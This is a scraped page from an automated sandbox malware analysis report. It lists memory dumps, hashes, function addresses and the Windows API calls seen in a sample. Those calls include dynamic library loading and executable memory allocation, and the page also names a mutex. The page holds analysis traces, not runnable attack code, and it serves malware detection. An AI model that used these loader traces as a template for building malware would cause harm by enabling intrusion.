Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: SizeofResource$kernel32.dll
API String ID: 2574300362-1445693867
Opcode ID: 971289207801f0adfb33d8d7a52fdaf637566f62aa59e6dc078033588d0b97f7
Instruction ID: 1f67b7e38132fca7fb6d3c7304225dc3284bb93b5259144f6b05d2bd588ba888
Opcode Fuzzy Hash: 971289207801f0adfb33d8d7a52fdaf637566f62aa59e6dc078033588d0b97f7
Instruction Fuzzy Hash: B4C09B705C1300DBC7406BF07F0DA0537556645F41311007EB843F11F0CEB910115B1D

Function 00402E80 Relevance: 6.1, APIs: 4, Instructions: 71windowCOMMON

Download Yara Rule

APIs

#470.MFC42 ref: 00402E9F
SendMessageA.USER32(?,00000027,?,00000000), ref: 00402EBB
#755.MFC42 ref: 00402F1B
#2379.MFC42 ref: 00402F29

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: #2379#470#755MessageSend
String ID:
API String ID: 516545250-0
Opcode ID: 19307cc0112b641f42c05127e240e9b621d2d73733c872dcc2d07d297b7f00d4
Instruction ID: ae483ed0e89d9e4723fdc79b7f6c9c7c3acea37d86427cf1e14bb756db3c141b
Opcode Fuzzy Hash: 19307cc0112b641f42c05127e240e9b621d2d73733c872dcc2d07d297b7f00d4
Instruction Fuzzy Hash: 3D117C712143029BC214DF39DE89D6BBBEAFFD8205F084A2DF58AD32D0DA34E9058B55

Function 00402890 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 61sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4), ref: 004028F5
Sleep.KERNEL32(000001F4), ref: 00402947
Sleep.KERNEL32(000001F4), ref: 0040299A

Strings

X7@, xrefs: 00402895

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: X7@
API String ID: 3472027048-2067089342
Opcode ID: 92fada5cfdbc6a922edbaf3abd6bdbc867ed69b1f2908b021d67a98f8e651ac5
Instruction ID: 56058c761996469b055373d7f4e5675fd511cabc212af0c966289d5b43759b51
Opcode Fuzzy Hash: 92fada5cfdbc6a922edbaf3abd6bdbc867ed69b1f2908b021d67a98f8e651ac5
Instruction Fuzzy Hash: EE21F9B12982129BDB00DF71EF08B5A3B66A7D8745F10843EE184762E4CFB95445CFAC

Function 004011F0 Relevance: 6.0, APIs: 4, Instructions: 29windowCOMMON

Download Yara Rule

APIs

#324.MFC42(00000066,00000000,?,?,00000000,00405C38,000000FF,004010ED,00000000), ref: 00401214
#1168.MFC42(00000066,00000000,?,?,00000000), ref: 00401227
#1146.MFC42(00000080,0000000E,00000080,00000066,00000000,?,?,00000000), ref: 00401238
LoadIconA.USER32(00000000,00000080), ref: 0040123E

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: #1146#1168#324IconLoad
String ID:
API String ID: 193567849-0
Opcode ID: b0d8ebbce458bee7b7671c312a9a251e003c61d6e3bc7029ecfa220d6c6ff1fb
Instruction ID: 5f364d0ca6f0da87c9e4d08cbfa7f53ff09ba6a78162f9d23447e03a582c3780
Opcode Fuzzy Hash: b0d8ebbce458bee7b7671c312a9a251e003c61d6e3bc7029ecfa220d6c6ff1fb
Instruction Fuzzy Hash: 0CF082B1644B50ABE310DF59CD42B0ABAD8FB04B11F008A2EF591A77C0CBBD95008B59

Function 0047708F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(0019FF0C), ref: 004770FE
GetProcAddress.KERNEL32(00000000,00477197), ref: 00477109

Strings

.DLL, xrefs: 004770F4

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: .DLL
API String ID: 1646373207-899428287
Opcode ID: 9b51216898ffcb4fe806c96a28a5bcfa5a3a5ee25ac287b27db5695e7a1a30a7
Instruction ID: 7b29dc7dbdc5564260aebfda9c3e9341b44fd7a4bf5765f7172cf8c8c37ad89c
Opcode Fuzzy Hash: 9b51216898ffcb4fe806c96a28a5bcfa5a3a5ee25ac287b27db5695e7a1a30a7
Instruction Fuzzy Hash: A601C03060F104EA8F649E3CC949AFA3BADFF44341FC08556E90D8B696C7788E41979E

Function 7FE31079 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(0380FF20), ref: 7FE310E8
GetProcAddress.KERNEL32(00000000,7FE31181), ref: 7FE310F3

Strings

.DLL, xrefs: 7FE310DE

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: .DLL
API String ID: 1646373207-899428287
Opcode ID: 5fdbe1fdb9a291c56d0de1b0085fc354e7c21eb32f0bc32c042edfe8f07510ff
Instruction ID: 5900f217701f080c4111b40af2f692126b674fcdb3668acd741284d8170f4144
Opcode Fuzzy Hash: 5fdbe1fdb9a291c56d0de1b0085fc354e7c21eb32f0bc32c042edfe8f07510ff
Instruction Fuzzy Hash: B301C835D00584EBC7659F38C54DADF3B7BEF08266F800118E5268A455C6F8DA90CFA1

Function 006F10CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(0365FCF0), ref: 006F113D
GetProcAddress.KERNEL32(00000000,006F11D6), ref: 006F1148

Strings

.DLL, xrefs: 006F1133

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: .DLL
API String ID: 1646373207-899428287
Opcode ID: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
Instruction ID: ad701b94ddcba6a2c9a070a3db55a21709ca0bea512e2976f6d1407f2ad5bdff
Opcode Fuzzy Hash: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
Instruction Fuzzy Hash: BC018030607009EADF65DE6CC849AFA3B6EEF063D1F104114EB1A8F256CB708E9186A5

Function 00401980 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 004019A0

Strings

hra%u.dll, xrefs: 0040198C
<6@, xrefs: 00401992

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: <6@$hra%u.dll
API String ID: 1029625771-964591844
Opcode ID: 2390837fc517bc62a5bb002552fb09d752def2f0a1c79550ccc7e106046599eb
Instruction ID: e7fbf41a89d2fe79915ad9526865f0c88ed692e155a9173a154c572c31764057
Opcode Fuzzy Hash: 2390837fc517bc62a5bb002552fb09d752def2f0a1c79550ccc7e106046599eb
Instruction Fuzzy Hash: C1D0A77059030167D710A770ED4AAA633646B54700F444A3D7686D11D0EABD815CC689

Analysis Process: hrl97AF.tmpPID: 3388, Parent PID: 5656COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1867
Total number of Limit Nodes:	4

Executed Functions

Function 0047D14A Relevance: 35.3, APIs: 16, Strings: 4, Instructions: 281
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 0047D1D5
GetVersion.KERNEL32 ref: 0047D217
VirtualAlloc.KERNEL32(00000000,000065A4,08001000,00000040), ref: 0047D23F
CloseHandle.KERNEL32(?), ref: 0047D2C4

Strings

"'3, xrefs: 0047D30B
csrs, xrefs: 0047D53D
\BaseNamedObjects\rnxtVt, xrefs: 0047D420, 0047D43D, 0047D44B
\BaseNamedObjects\rnxtVt, xrefs: 0047D41F

Memory Dump Source

Source File: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
